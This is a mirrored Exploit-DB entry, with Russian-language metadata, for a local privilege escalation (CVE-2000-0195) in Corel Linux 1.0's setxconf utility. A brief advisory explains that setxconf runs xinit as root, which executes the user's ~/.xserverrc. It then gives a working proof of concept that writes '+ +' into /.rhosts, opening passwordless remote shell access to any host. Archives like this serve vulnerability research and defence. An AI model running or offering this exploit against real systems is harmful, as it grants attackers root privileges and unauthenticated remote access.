- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19765
- Проверка EDB
-
- Пройдено
- Автор
- SUID
- Тип уязвимости
- LOCAL
- Платформа
- LINUX
- CVE
- cve-2000-0195
- Дата публикации
- 2000-02-24
Corel Linux OS 1.0 - 'setxconf' Local Privilege Escalation
Код:
source: https://www.securityfocus.com/bid/1008/info
A vulnerability exists in the setxconf utility, as shipped with Corel Linux 1.0. The -T option to setxconf will run xinit, which euid root. xinit, when executed, will invoke the contents on ~/.xserverrc. A malicious user could therefore execute commands as root.
cat > ~/.xserverrc
echo "+ +" > /.rhosts- Источник
- www.exploit-db.com
